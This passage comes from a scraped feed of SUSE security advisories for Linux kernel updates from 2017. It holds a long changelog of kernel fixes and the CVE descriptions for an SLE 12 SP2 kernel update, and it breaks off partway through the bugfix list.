v4l2-compat-ioctl32: Fix timespec conversion (bnc#1012382).\n - mips: Ensure bss section ends on a long-aligned address (bnc#1012382).\n - mips: Fix minimum alignment requirement of IRQ stack (git-fixes).\n - mips: IRQ Stack: Unwind IRQ stack onto task stack (bnc#1012382).\n - mips: Lantiq: Fix another request_mem_region() return code check\n (bnc#1012382).\n - mips: math-emu: <MAXA|MINA>.<D|S>: Fix cases of both infinite inputs\n (bnc#1012382).\n - mips: math-emu: <MAXA|MINA>.<D|S>: Fix cases of input values with\n opposite signs (bnc#1012382).\n - mips: math-emu: <MAX|MAXA|MIN|MINA>.<D|S>: Fix cases of both inputs zero\n (bnc#1012382).\n - mips: math-emu: <MAX|MAXA|MIN|MINA>.<D|S>: Fix quiet NaN propagation\n (bnc#1012382).\n - mips: math-emu: <MAX|MIN>.<D|S>: Fix cases of both inputs negative\n (bnc#1012382).\n - mips: math-emu: MINA.<D|S>: Fix some cases of infinity and zero inputs\n (bnc#1012382).\n - mips: math-emu: Remove pr_err() calls from fpu_emu() (bnc#1012382).\n - mips: ralink: Fix incorrect assignment on ralink_soc (bnc#1012382).\n - mlx5: Avoid that mlx5_ib_sg_to_klms() overflows the klms array\n (bsc#966170 FATE#320225 bsc#966172 FATE#320226).\n - mm/backing-dev.c: fix an error handling path in 'cgwb_create()'\n (bnc#1063475).\n - mm,compaction: serialize waitqueue_active() checks (for real)\n (bsc#971975).\n - mmc: sdio: fix alignment issue in struct sdio_func (bnc#1012382).\n - mm: discard memblock data later (bnc#1063460).\n - mm/memblock.c: reversed logic in memblock_discard() (bnc#1063460).\n - mm: meminit: mark init_reserved_page as __meminit (bnc#1063509).\n - mm/memory_hotplug: change pfn_to_section_nr/section_nr_to_pfn macro to\n inline function (bnc#1063501).\n - mm/memory_hotplug: define find_{smallest|biggest}_section_pfn as\n unsigned long (bnc#1063520).\n - mm: prevent double decrease of nr_reserved_highatomic (bnc#1012382).\n - net: core: Prevent from dereferencing null pointer when releasing SKB\n (bnc#1012382).\n - net: emac: Fix 
napi poll list corruption (bnc#1012382).\n - netfilter: invoke synchronize_rcu after set the _hook_ to NULL\n (bnc#1012382).\n - netfilter: nf_ct_expect: Change __nf_ct_expect_check() return value\n (bnc#1012382).\n - netfilter: nfnl_cthelper: fix incorrect helper->expect_class_max\n (bnc#1012382).\n - net/mlx4_core: Enable 4K UAR if SRIOV module parameter is not enabled\n (bsc#966191 FATE#320230 bsc#966186 FATE#320228).\n - net/mlx4_core: Fix VF overwrite of module param which disables DMFS on\n new probed PFs (bnc#1012382).\n - net/mlx4_en: fix overflow in mlx4_en_init_timestamp() (bnc#1012382).\n - net/mlx5e: Fix wrong delay calculation for overflow check scheduling\n (bsc#966170 FATE#320225 bsc#966172 FATE#320226).\n - net/mlx5e: Schedule overflow check work to mlx5e workqueue (bsc#966170\n FATE#320225 bsc#966172 FATE#320226).\n - net/mlx5: Skip mlx5_unload_one if mlx5_load_one fails (bsc#966170\n FATE#320225 bsc#966172 FATE#320226).\n - net: mvpp2: release reference to txq_cpu[] entry after unmapping\n (bnc#1012382).\n - net/packet: check length in getsockopt() called with PACKET_HDRLEN\n (bnc#1012382).\n - net: Set sk_prot_creator when cloning sockets to the right proto\n (bnc#1012382).\n - nfsd/callback: Cleanup callback cred on shutdown (bnc#1012382).\n - nfsd: Fix general protection fault in release_lock_stateid()\n (bnc#1012382).\n - nl80211: Define policy for packet pattern attributes (bnc#1012382).\n - nvme: protect against simultaneous shutdown invocations (FATE#319965\n bnc#1012382 bsc#964944).\n - packet: only test po->has_vnet_hdr once in packet_snd (bnc#1012382).\n - parisc: Avoid trashing sr2 and sr3 in LWS code (bnc#1012382).\n - parisc: Fix double-word compare and exchange in LWS code on 32-bit\n kernels (bnc#1012382).\n - parisc: perf: Fix potential NULL pointer dereference (bnc#1012382).\n - partitions/efi: Fix integer overflow in GPT size calculation\n (bnc#1012382).\n - pci: Allow PCI express root ports to find themselves (bsc#1061046).\n - 
pci: fix oops when try to find Root Port for a PCI device (bsc#1061046).\n - pci: Fix race condition with driver_override (bnc#1012382).\n - pci: shpchp: Enable bridge bus mastering if MSI is enabled (bnc#1012382).\n - percpu: make this_cpu_generic_read() atomic w.r.t. interrupts\n (bnc#1012382).\n - perf/x86: Fix RDPMC vs. mm_struct tracking (bsc#1061831).\n - perf/x86: kABI Workaround for 'perf/x86: Fix RDPMC vs. mm_struct\n tracking' (bsc#1061831).\n - pkcs7: Prevent NULL pointer dereference, since sinfo is not always set\n (bnc#1012382).\n - powerpc: Fix DAR reporting when alignment handler faults (bnc#1012382).\n - powerpc/pseries: Fix parent_dn reference leak in add_dt_node()\n (bnc#1012382).\n - qed: Fix stack corruption on probe (bsc#966318 FATE#320158 bsc#966316\n FATE#320159).\n - qlge: avoid memcpy buffer overflow (bnc#1012382).\n - rcu: Allow for page faults in NMI handlers (bnc#1012382).\n - rds: ib: add error handle (bnc#1012382).\n - rds: RDMA: Fix the composite message user notification (bnc#1012382).\n - Revert "bsg-lib: do not free job in bsg_prepare_job" (bnc#1012382).\n - Revert "net: fix percpu memory leaks" (bnc#1012382).\n - Revert "net: phy: Correctly process PHY_HALTED in phy_stop_machine()"\n (bnc#1012382).\n - Revert "net: use lib/percpu_counter API for fragmentation mem\n accounting" (bnc#1012382).\n - Revert "tty: goldfish: Fix a parameter of a call to free_irq"\n (bnc#1012382).\n - rtlwifi: rtl8821ae: Fix connection lost problem (bnc#1012382).\n - sched/autogroup: Fix autogroup_move_group() to never skip\n sched_move_task() (bnc#1012382).\n - sched/cpuset/pm: Fix cpuset vs. 
suspend-resume bugs (bnc#1012382).\n - scsi: hpsa: add 'ctlr_num' sysfs attribute (bsc#1028971).\n - scsi: hpsa: bump driver version (bsc#1022600 fate#321928).\n - scsi: hpsa: change driver version (bsc#1022600 bsc#1028971 fate#321928).\n - scsi: hpsa: Check for null device pointers (bsc#1028971).\n - scsi: hpsa: Check for null devices in ioaccel (bsc#1028971).\n - scsi: hpsa: Check for vpd support before sending (bsc#1028971).\n - scsi: hpsa: cleanup reset handler (bsc#1022600 fate#321928).\n - scsi: hpsa: correct call to hpsa_do_reset (bsc#1028971).\n - scsi: hpsa: correct logical resets (bsc#1028971).\n - scsi: hpsa: correct queue depth for externals (bsc#1022600 fate#321928).\n - scsi: hpsa: correct resets on retried commands (bsc#1022600 fate#321928).\n - scsi: hpsa: correct scsi 6byte lba calculation (bsc#1028971).\n - scsi: hpsa: Determine device external status earlier (bsc#1028971).\n - scsi: hpsa: do not get enclosure info for external devices (bsc#1022600\n fate#321928).\n - scsi: hpsa: do not reset enclosures (bsc#1022600 fate#321928).\n - scsi: hpsa: do not timeout reset operations (bsc#1022600 bsc#1028971\n fate#321928).\n - scsi: hpsa: fallback to use legacy REPORT PHYS command (bsc#1028971).\n - scsi: hpsa: fix volume offline state (bsc#1022600 bsc#1028971\n fate#321928).\n - scsi: hpsa: limit outstanding rescans (bsc#1022600 bsc#1028971\n fate#321928).\n - scsi: hpsa: Prevent sending bmic commands to externals (bsc#1028971).\n - scsi: hpsa: remove abort handler (bsc#1022600 fate#321928).\n - scsi: hpsa: remove coalescing settings for ioaccel2 (bsc#1028971).\n - scsi: hpsa: remove memory allocate failure message (bsc#1028971).\n - scsi: hpsa: Remove unneeded void pointer cast (bsc#1028971).\n - scsi: hpsa: rescan later if reset in progress (bsc#1022600 fate#321928).\n - scsi: hpsa: send ioaccel requests with 0 length down raid path\n (bsc#1022600 fate#321928).\n - scsi: hpsa: separate monitor events from rescan worker (bsc#1022600\n fate#321928).\n 
- scsi: hpsa: update check for logical volume status (bsc#1022600\n bsc#1028971 fate#321928).\n - scsi: hpsa: update identify physical device structure (bsc#1022600\n fate#321928).\n - scsi: hpsa: update pci ids (bsc#1022600 bsc#1028971 fate#321928).\n - scsi: hpsa: update reset handler (bsc#1022600 fate#321928).\n - scsi: hpsa: use designated initializers (bsc#1028971).\n - scsi: hpsa: use %phN for short hex dumps (bsc#1028971).\n - scsi: ILLEGAL REQUEST + ASC==27 => target failure (bsc#1059465).\n - scsi: libfc: fix a deadlock in fc_rport_work (bsc#1063695).\n - scsi: megaraid_sas: Check valid aen class range to avoid kernel panic\n (bnc#1012382).\n - scsi: megaraid_sas: Return pended IOCTLs with cmd_status\n MFI_STAT_WRONG_STATE in case adapter is dead (bnc#1012382).\n - scsi: reset wait for IO completion (bsc#996376).\n - scsi: scsi_dh_emc: return success in clariion_std_inquiry()\n (bnc#1012382).\n - scsi: scsi_transport_fc: Also check for NOTPRESENT in\n fc_remote_port_add() (bsc#1037890).\n - scsi: scsi_transport_fc: set scsi_target_id upon rescan (bsc#1058135).\n - scsi: sd: Do not override max_sectors_kb sysfs setting (bsc#1025461).\n - scsi: sd: Remove LBPRZ dependency for discards (bsc#1060985).\n - scsi: sg: close race condition in sg_remove_sfp_usercontext()\n (bsc#1064206).\n - scsi: sg: do not return bogus Sg_requests (bsc#1064206).\n - scsi: sg: factor out sg_fill_request_table() (bnc#1012382).\n - scsi: sg: fixup infoleak when using SG_GET_REQUEST_TABLE (bnc#1012382).\n - scsi: sg: off by one in sg_ioctl() (bnc#1012382).\n - scsi: sg: only check for dxfer_len greater than 256M (bsc#1064206).\n - scsi: sg: remove 'save_scat_len' (bnc#1012382).\n - scsi: sg: use standard lists for sg_requests (bnc#1012382).\n - scsi: storvsc: fix memory leak on ring buffer busy (bnc#1012382).\n - scsi: zfcp: add handling for FCP_RESID_OVER to the fcp ingress path\n (bnc#1012382).\n - scsi: zfcp: fix capping of unsuccessful GPN_FT SAN response trace\n records 
(bnc#1012382).\n - scsi: zfcp: fix missing trace records for early returns in TMF eh\n handlers (bnc#1012382).\n - scsi: zfcp: fix passing fsf_req to SCSI trace on TMF to correlate with\n HBA (bnc#1012382).\n - scsi: zfcp: fix payload with full FCP_RSP IU in SCSI trace records\n (bnc#1012382).\n - scsi: zfcp: fix queuecommand for scsi_eh commands when DIX enabled\n (bnc#1012382).\n - scsi: zfcp: trace HBA FSF response by default on dismiss or timedout\n late response (bnc#1012382).\n - scsi: zfcp: trace high part of "new" 64 bit SCSI LUN (bnc#1012382).\n - sctp: potential read out of bounds in sctp_ulpevent_type_enabled()\n (bnc#1012382).\n - seccomp: fix the usage of get/put_seccomp_filter() in\n seccomp_get_filter() (bnc#1012382).\n - sh_eth: use correct name for ECMR_MPDE bit (bnc#1012382).\n - skd: Avoid that module unloading triggers a use-after-free (bnc#1012382).\n - skd: Submit requests to firmware before triggering the doorbell\n (bnc#1012382).\n - slub: do not merge cache if slub_debug contains a never-merge flag\n (bnc#1012382).\n - smb3: Do not ignore O_SYNC/O_DSYNC and O_DIRECT flags (bnc#1012382).\n - smb: Validate negotiate (to protect against downgrade) even if signing\n off (bnc#1012382).\n - sparc64: Migrate hvcons irq to panicked cpu (bnc#1012382).\n - staging: iio: ad7192: Fix - use the dedicated reset function avoiding\n dma from stack (bnc#1012382).\n - stm class: Fix a use-after-free (bnc#1012382).\n - supported.conf: mark hid-multitouch as supported (FATE#323670)\n - swiotlb-xen: implement xen_swiotlb_dma_mmap callback (bnc#1012382).\n - target/iscsi: Fix unsolicited data seq_end_offset calculation\n (bnc#1012382).\n - team: call netdev_change_features out of team lock (bsc#1055567).\n - team: fix memory leaks (bnc#1012382).\n - timer/sysclt: Restrict timer migration sysctl values to 0 and 1\n (bnc#1012382).\n - tipc: use only positive error codes in messages (bnc#1012382).\n - tpm_tis: Do not fall back to a hardcoded address for TPM2 
(bsc#1020645,\n fate#321435, fate#321507, fate#321600, bsc#1034048).\n - tracing: Apply trace_clock changes to instance max buffer (bnc#1012382).\n - tracing: Erase irqsoff trace with empty write (bnc#1012382).\n - tracing: Fix trace_pipe behavior for instance traces (bnc#1012382).\n - ttpci: address stringop overflow warning (bnc#1012382).\n - tty: fix __tty_insert_flip_char regression (bnc#1012382).\n - tty: goldfish: Fix a parameter of a call to free_irq (bnc#1012382).\n - tty: improve tty_insert_flip_char() fast path (bnc#1012382).\n - tty: improve tty_insert_flip_char() slow path (bnc#1012382).\n - tun: bail out from tun_get_user() if the skb is empty (bnc#1012382).\n - uapi: fix linux/mroute6.h userspace compilation errors (bnc#1012382).\n - uapi: fix linux/rds.h userspace compilation errors (bnc#1012382).\n - udpv6: Fix the checksum computation when HW checksum does not apply\n (bnc#1012382).\n - usb: cdc_acm: Add quirk for Elatec TWN3 (bnc#1012382).\n - usb: chipidea: vbus event may exist before starting gadget (bnc#1012382).\n - usb: core: fix out-of-bounds access bug in usb_get_bos_descriptor()\n (bnc#1012382).\n - usb: core: harden cdc_parse_cdc_header (bnc#1012382).\n - usb: devio: Do not corrupt user memory (bnc#1012382).\n - usb: devio: Revert "USB: devio: Do not corrupt user memory"\n (bnc#1012382).\n - usb: dummy-hcd: fix connection failures (wrong speed) (bnc#1012382).\n - usb: dummy-hcd: Fix deadlock caused by disconnect detection\n (bnc#1012382).\n - usb: dummy-hcd: Fix erroneous synchronization change (bnc#1012382).\n - usb: dummy-hcd: fix infinite-loop resubmission bug (bnc#1012382).\n - usb: fix out-of-bounds in usb_set_configuration (bnc#1012382).\n - usb: gadget: composite: Fix use-after-free in\n usb_composite_overwrite_options (bnc#1012382).\n - usb: gadgetfs: fix copy_to_user while holding spinlock (bnc#1012382).\n - usb: gadgetfs: Fix crash caused by inadequate synchronization\n (bnc#1012382).\n - usb: gadget: inode.c: fix unbalanced 
spin_lock in ep0_write\n (bnc#1012382).\n - usb: gadget: mass_storage: set msg_registered after msg registered\n (bnc#1012382).\n - usb: gadget: udc: atmel: set vbus irqflags explicitly (bnc#1012382).\n - usb: g_mass_storage: Fix deadlock when driver is unbound (bnc#1012382).\n - usb: hub: Allow reset retry for USB2 devices on connect bounce\n (bnc#1012382).\n - usb: Increase quirk delay for USB devices (bnc#1012382).\n - usb: musb: Check for host-mode using is_host_active() on reset interrupt\n (bnc#1012382).\n - usb: musb: sunxi: Explicitly release USB PHY on exit (bnc#1012382).\n - usb: pci-quirks.c: Corrected timeout values used in handshake\n (bnc#1012382).\n - usb: plusb: Add support for PL-27A1 (bnc#1012382).\n - usb: quirks: add quirk for WORLDE MINI MIDI keyboard (bnc#1012382).\n - usb: renesas_usbhs: Fix DMAC sequence for receiving zero-length packet\n (bnc#1012382).\n - usb: renesas_usbhs: fix the BCLR setting condition for non-DCP pipe\n (bnc#1012382).\n - usb: renesas_usbhs: fix usbhsf_fifo_clear() for RX direction\n (bnc#1012382).\n - usb: serial: console: fix use-after-free after failed setup\n (bnc#1012382).\n - usb: serial: cp210x: add support for ELV TFD500 (bnc#1012382).\n - usb: serial: ftdi_sio: add id for Cypress WICED dev board (bnc#1012382).\n - usb: serial: metro-usb: add MS7820 device id (bnc#1012382).\n - usb: serial: mos7720: fix control-message error handling (bnc#1012382).\n - usb: serial: mos7840: fix control-message error handling (bnc#1012382).\n - usb: serial: option: add support for TP-Link LTE module (bnc#1012382).\n - usb: serial: qcserial: add Dell DW5818, DW5819 (bnc#1012382).\n - usb-storage: unusual_devs entry to fix write-access regression for\n Seagate external drives (bnc#1012382).\n - usb: uas: fix bug in handling of alternate settings (bnc#1012382).\n - uwb: ensure that endpoint is interrupt (bnc#1012382).\n - uwb: properly check kthread_run return value (bnc#1012382).\n - vfs: Return -ENXIO for negative SEEK_HOLE / 
SEEK_DATA offsets\n (bnc#1012382).\n - video: fbdev: aty: do not leak uninitialized padding in clk to userspace\n (bnc#1012382).\n - vti: fix use after free in vti_tunnel_xmit/vti6_tnl_xmit (bnc#1012382).\n - watchdog: kempld: fix gcc-4.3 build (bnc#1012382).\n - x86/alternatives: Fix alt_max_short macro to really be a max()\n (bnc#1012382).\n - x86/fpu: Do not let userspace set bogus xcomp_bv (bnc#1012382).\n - x86/fsgsbase/64: Report FSBASE and GSBASE correctly in core dumps\n (bnc#1012382).\n - x86/ldt: Fix off by one in get_segment_base() (bsc#1061872).\n - xfs/dmapi: fix incorrect file->f_path.dentry->d_inode usage\n (bsc#1055896).\n - xfs: handle error if xfs_btree_get_bufs fails (bsc#1059863).\n - xfs: remove kmem_zalloc_greedy (bnc#1012382).\n - xhci: fix finding correct bus_state structure for USB 3.1 hosts\n (bnc#1012382).\n\n", "edition": 1, "modified": "2017-12-12T15:07:51", "published": "2017-12-12T15:07:51", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-12/msg00027.html", "id": "SUSE-SU-2017:3267-1", "type": "suse", "title": "Security update for the Linux Kernel (important)", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-10-27T20:32:02", "bulletinFamily": "unix", "cvelist": ["CVE-2017-14051", "CVE-2017-13080", "CVE-2017-14489", "CVE-2017-7518", "CVE-2017-15649", "CVE-2017-1000252", "CVE-2017-11472", "CVE-2017-8831", "CVE-2017-10810", "CVE-2017-14106", "CVE-2017-11473", "CVE-2017-7541", "CVE-2017-12134", "CVE-2017-12153", "CVE-2017-6346", "CVE-2017-7542", "CVE-2017-12154"], "description": "The SUSE Linux Enterprise 12 SP2 kernel was updated to 4.4.90 to receive\n various security and bugfixes.\n\n The following security bugs were fixed:\n\n - CVE-2017-1000252: The KVM subsystem in the Linux kernel allowed guest OS\n users to cause a denial of service (assertion failure, and hypervisor\n hang or crash) via an out-of bounds guest_irq value, related to\n 
arch/x86/kvm/vmx.c and virt/kvm/eventfd.c (bnc#1058038).\n - CVE-2017-10810: Memory leak in the virtio_gpu_object_create function in\n drivers/gpu/drm/virtio/virtgpu_object.c in the Linux kernel allowed\n attackers to cause a denial of service (memory consumption) by\n triggering object-initialization failures (bnc#1047277).\n - CVE-2017-11472: The acpi_ns_terminate() function in\n drivers/acpi/acpica/nsutils.c in the Linux kernel did not flush the\n operand cache and causes a kernel stack dump, which allowed local users\n to obtain sensitive information from kernel memory and bypass the KASLR\n protection mechanism (in the kernel through 4.9) via a crafted ACPI\n table (bnc#1049580).\n - CVE-2017-11473: Buffer overflow in the mp_override_legacy_irq() function\n in arch/x86/kernel/acpi/boot.c in the Linux kernel allowed local users\n to gain privileges via a crafted ACPI table (bnc#1049603).\n - CVE-2017-12134: The xen_biovec_phys_mergeable function in\n drivers/xen/biomerge.c in Xen might allow local OS guest users to\n corrupt block device data streams and consequently obtain sensitive\n memory information, cause a denial of service, or gain host OS\n privileges by leveraging incorrect block IO merge-ability calculation\n (bnc#1051790 bnc#1053919).\n - CVE-2017-12153: A security flaw was discovered in the\n nl80211_set_rekey_data() function in net/wireless/nl80211.c in the Linux\n kernel. This function did not check whether the required attributes are\n present in a Netlink request. 
This request can be issued by a user with\n the CAP_NET_ADMIN capability and may result in a NULL pointer\n dereference and system crash (bnc#1058410).\n - CVE-2017-12154: The prepare_vmcs02 function in arch/x86/kvm/vmx.c in the\n Linux kernel did not ensure that the "CR8-load exiting" and "CR8-store\n exiting" L0 vmcs02 controls exist in cases where L1 omits the "use TPR\n shadow" vmcs12 control, which allowed KVM L2 guest OS users to obtain\n read and write access to the hardware CR8 register (bnc#1058507).\n - CVE-2017-13080: Wi-Fi Protected Access (WPA and WPA2) allowed\n reinstallation of the Group Temporal Key (GTK) during the group key\n handshake, allowing an attacker within radio range to replay frames from\n access points to clients (bnc#1063667).\n - CVE-2017-14051: An integer overflow in the\n qla2x00_sysfs_write_optrom_ctl function in\n drivers/scsi/qla2xxx/qla_attr.c in the Linux kernel allowed local users\n to cause a denial of service (memory corruption and system crash) by\n leveraging root access (bnc#1056588).\n - CVE-2017-14106: The tcp_disconnect function in net/ipv4/tcp.c in the\n Linux kernel allowed local users to cause a denial of service\n (__tcp_select_window divide-by-zero error and system crash) by\n triggering a disconnect within a certain tcp_recvmsg code path\n (bnc#1056982).\n - CVE-2017-14489: The iscsi_if_rx function in\n drivers/scsi/scsi_transport_iscsi.c in the Linux kernel allowed local\n users to cause a denial of service (panic) by leveraging incorrect\n length validation (bnc#1059051).\n - CVE-2017-15649: net/packet/af_packet.c in the Linux kernel allowed local\n users to gain privileges via crafted system calls that trigger\n mishandling of packet_fanout data structures, because of a race\n condition (involving fanout_add and packet_do_bind) that leads to a\n use-after-free, a different vulnerability than CVE-2017-6346\n (bnc#1064388).\n - CVE-2017-7518: The Linux kernel was vulnerable to an incorrect debug\n 
exception(#DB) error. It could occur while emulating a syscall\n instruction and potentially lead to guest privilege escalation.\n (bsc#1045922).\n - CVE-2017-7541: The brcmf_cfg80211_mgmt_tx function in\n drivers/net/wireless/broadcom/brcm80211/brcmfmac/cfg80211.c in the Linux\n kernel allowed local users to cause a denial of service (buffer overflow\n and system crash) or possibly gain privileges via a crafted\n NL80211_CMD_FRAME Netlink packet (bnc#1049645).\n - CVE-2017-7542: The ip6_find_1stfragopt function in\n net/ipv6/output_core.c in the Linux kernel allowed local users to cause\n a denial of service (integer overflow and infinite loop) by leveraging\n the ability to open a raw socket (bnc#1049882).\n - CVE-2017-8831: The saa7164_bus_get function in\n drivers/media/pci/saa7164/saa7164-bus.c in the Linux kernel allowed\n local users to cause a denial of service (out-of-bounds array access) or\n possibly have unspecified other impact by changing a certain\n sequence-number value, aka a "double fetch" vulnerability (bnc#1037994).\n\n The following non-security bugs were fixed:\n\n - acpi / processor: Avoid reserving IO regions too early (bsc#1051478).\n - acpi / scan: Prefer devices without _HID for _ADR matching (git-fixes).\n - af_key: Add lock to key dump (bsc#1047653).\n - af_key: Fix slab-out-of-bounds in pfkey_compile_policy (bsc#1047354).\n - alsa: fm801: Initialize chip after IRQ handler is registered\n (bsc#1031717).\n - alsa: hda - Add stereo mic quirk for Lenovo G50-70 (17aa:3978)\n (bsc#1020657).\n - alsa: hda - Fix endless loop of codec configure (bsc#1031717).\n - alsa: hda - Implement mic-mute LED mode enum (bsc#1055013).\n - alsa: hda/realtek - Add support headphone Mic for ALC221 of HP platform\n (bsc#1024405).\n - alsa: hda - set input_path bitmap to zero after moving it to new place\n (bsc#1031717).\n - alsa: ice1712: Add support for STAudio ADCIII (bsc#1048934).\n - alsa: usb-audio: Apply sample rate quirk to Sennheiser headset\n 
(bsc#1052580).\n - arc: Re-enable MMU upon Machine Check exception (bnc#1012382).\n - arm64: fault: Route pte translation faults via do_translation_fault\n (bnc#1012382).\n - arm64: Make sure SPsel is always set (bnc#1012382).\n - arm: pxa: add the number of DMA requestor lines (bnc#1012382).\n - arm: pxa: fix the number of DMA requestor lines (bnc#1012382).\n - b43: Add missing MODULE_FIRMWARE() (bsc#1037344).\n - bcache: correct cache_dirty_target in __update_writeback_rate()\n (bnc#1012382).\n - bcache: Correct return value for sysfs attach errors (bnc#1012382).\n - bcache: do not subtract sectors_to_gc for bypassed IO (bnc#1012382).\n - bcache: fix bch_hprint crash and improve output (bnc#1012382).\n - bcache: fix for gc and write-back race (bnc#1012382).\n - bcache: Fix leak of bdev reference (bnc#1012382).\n - bcache: force trigger gc (bsc#1038078).\n - bcache: initialize dirty stripes in flash_dev_run() (bnc#1012382).\n - bcache: only recovery I/O error for writethrough mode (bsc#1043652).\n - bdi: Fix use-after-free in wb_congested_put() (bsc#1040307).\n - blacklist 2400fd822f46 powerpc/asm: Mark cr0 as clobbered in mftb()\n - blacklist.conf: 9eeacd3a2f17 not a bug fix (bnc#1050061)\n - blacklist.conf: add unapplicable/cosmetic iwlwifi fixes (bsc#1031717).\n - blacklist.conf: add unapplicable drm fixes (bsc#1031717).\n - blacklist.conf: Blacklist 4e201566402c ('genirq/msi: Drop artificial PCI\n dependency') (bsc#1051478) This commit just removes an include and does\n not fix a real issue.\n - blacklist.conf: Blacklist aa2369f11ff7 ('mm/gup.c: fix access_ok()\n argument type') (bsc#1051478) Fixes only a compile-warning.\n - blacklist.conf: Blacklist c133c7615751 ('x86/nmi: Fix timeout test in\n test_nmi_ipi()') It only fixes a self-test (bsc#1051478).\n - blacklist.conf: Blacklist c9525a3fab63 ('x86/watchdog: Fix Kconfig help\n text file path reference to lockup watchdog documentation') Updates only\n kconfig help-text (bsc#1051478).\n - blacklist.conf: 
Blacklist e80e7edc55ba ('PCI/MSI: Initialize MSI\n capability for all architectures') This only fixes machines not\n supported by our kernels.\n - blkfront: add uevent for size change (bnc#1036632).\n - block: Allow bdi re-registration (bsc#1040307).\n - block: do not allow updates through sysfs until registration completes\n (bsc#1047027).\n - block: Fix front merge check (bsc#1051239).\n - block: Make del_gendisk() safer for disks without queues (bsc#1040307).\n - block: Move bdi_unregister() to del_gendisk() (bsc#1040307).\n - block: Relax a check in blk_start_queue() (bnc#1012382).\n - bluetooth: bnep: fix possible might sleep error in bnep_session\n (bsc#1031784).\n - bluetooth: cmtp: fix possible might sleep error in cmtp_session\n (bsc#1031784).\n - bluetooth: hidp: fix possible might sleep error in hidp_session_thread\n (bsc#1031784).\n - bnxt: add a missing rcu synchronization (bnc#1038583).\n - bnxt: do not busy-poll when link is down (bnc#1038583).\n - bnxt_en: Enable MRU enables bit when configuring VNIC MRU (bnc#1038583).\n - bnxt_en: Fix and clarify link_info->advertising (bnc#1038583).\n - bnxt_en: Fix a VXLAN vs GENEVE issue (bnc#1038583).\n - bnxt_en: Fix NULL pointer dereference in a failure path during open\n (bnc#1038583).\n - bnxt_en: Fix NULL pointer dereference in reopen failure path\n (bnc#1038583).\n - bnxt_en: fix pci cleanup in bnxt_init_one() failure path (bnc#1038583).\n - bnxt_en: Fix ring arithmetic in bnxt_setup_tc() (bnc#1038583).\n - bnxt_en: Fix TX push operation on ARM64 (bnc#1038583).\n - bnxt_en: Fix "uninitialized variable" bug in TPA code path (bnc#1038583).\n - bnxt_en: Fix VF virtual link state (bnc#1038583).\n - bnxt_en: initialize rc to zero to avoid returning garbage (bnc#1038583).\n - bnxt_en: Pad TX packets below 52 bytes (bnc#1038583).\n - bnxt_en: Refactor TPA code path (bnc#1038583).\n - brcmfmac: Fix glom_skb leak in brcmf_sdiod_recv_chain (bsc#1031717).\n - bsg-lib: do not free job in bsg_prepare_job 
(bnc#1012382).\n - btrfs: add cond_resched to btrfs_qgroup_trace_leaf_items (bsc#1028286).\n - btrfs: Add WARN_ON for qgroup reserved underflow (bsc#1031515).\n - btrfs: change how we decide to commit transactions during flushing\n (bsc#1060197).\n - btrfs: Do not clear SGID when inheriting ACLs (bsc#1030552).\n - btrfs: fix early ENOSPC due to delalloc (bsc#1049226).\n - btrfs: fix lockup in find_free_extent with read-only block groups\n (bsc#1046682).\n - btrfs: fix NULL pointer dereference from free_reloc_roots()\n (bnc#1012382).\n - btrfs: incremental send, fix invalid path for link commands\n (bsc#1051479).\n - btrfs: incremental send, fix invalid path for unlink commands\n (bsc#1051479).\n - btrfs: prevent to set invalid default subvolid (bnc#1012382).\n - btrfs: propagate error to btrfs_cmp_data_prepare caller (bnc#1012382).\n - btrfs: qgroup: move noisy underflow warning to debugging build\n (bsc#1055755).\n - btrfs: resume qgroup rescan on rw remount (bsc#1047152).\n - btrfs: send, fix invalid path after renaming and linking file\n (bsc#1051479).\n - ceph: fix readpage from fscache (bsc#1057015).\n - cifs: Fix SMB3.1.1 guest authentication to Samba (bnc#1012382).\n - cifs: release auth_key.response for reconnect (bnc#1012382).\n - class: Add "shutdown" to "struct class" (bsc#1053117).\n - cpuidle: dt: Add missing 'of_node_put()' (bnc#1022476).\n - crypto: AF_ALG - remove SGL terminator indicator when chaining\n (bnc#1012382).\n - crypto: s5p-sss - fix incorrect usage of scatterlists api (bsc#1048317).\n - crypto: talitos - Do not provide setkey for non hmac hashing algs\n (bnc#1012382).\n - crypto: talitos - fix sha224 (bnc#1012382).\n - cx82310_eth: use skb_cow_head() to deal with cloned skbs (bsc# 1045154).\n - cxgb4: Fix stack out-of-bounds read due to wrong size to\n t4_record_mbox() (bsc#1021424 bsc#1022743).\n - cxl: Fix driver use count (bnc#1012382).\n - cxl: Unlock on error in probe (bsc#1034762, Pending SUSE Kernel Fixes).\n - dentry name 
snapshots (bsc#1049483).\n - dmaengine: mmp-pdma: add number of requestors (bnc#1012382).\n - dm: fix second blk_delay_queue() parameter to be in msec units not\n (bsc#1047670).\n - drivers: hv: Fix the bug in generating the guest ID (fate#320485).\n - drivers: hv: util: Fix a typo (fate#320485).\n - drivers: hv: vmbus: Get the current time from the current clocksource\n (fate#320485, bnc#1044112, bnc#1042778, bnc#1029693).\n - drivers: hv: vmbus: Increase the time between retries in\n vmbus_post_msg() (fate#320485, bnc#1044112).\n - drivers: hv: vmbus: Move the code to signal end of message (fate#320485).\n - drivers: hv: vmbus: Move the definition of generate_guest_id()\n (fate#320485).\n - drivers: hv: vmbus: Move the definition of hv_x64_msr_hypercall_contents\n (fate#320485).\n - drivers: hv: vmbus: Restructure the clockevents code (fate#320485).\n - drivers: net: xgene: Fix wrong logical operation (bsc#1056827).\n - drm: Add driver-private objects to atomic state (bsc#1055493).\n - drm/amdgpu: Fix overflow of watermark calcs at > 4k resolutions\n (bsc#1031717).\n - drm/bochs: Implement nomodeset (bsc#1047096).\n - drm/dp: Introduce MST topology state to track available link bandwidth\n (bsc#1055493).\n - drm/i915/fbdev: Stop repeating tile configuration on stagnation\n (bsc#1031717).\n - drm/i915: Fix scaler init during CRTC HW state readout (bsc#1031717).\n - drm/i915: Serialize GTT/Aperture accesses on BXT (bsc#1046821).\n - drm/virtio: do not leak bo on drm_gem_object_init failure (bsc#1047277).\n - drm/vmwgfx: Fix large topology crash (bsc#1048155).\n - drm/vmwgfx: Limit max desktop dimensions to 8Kx8K (bsc#1048155).\n - drm/vmwgfx: Support topology greater than texture size (bsc#1048155).\n - efi/libstub: Skip GOP with PIXEL_BLT_ONLY format (bnc#974215).\n - ext2: Do not clear SGID when inheriting ACLs (bsc#1030552).\n - ext4: avoid unnecessary stalls in ext4_evict_inode() (bsc#1049486).\n - ext4: Do not clear SGID when inheriting 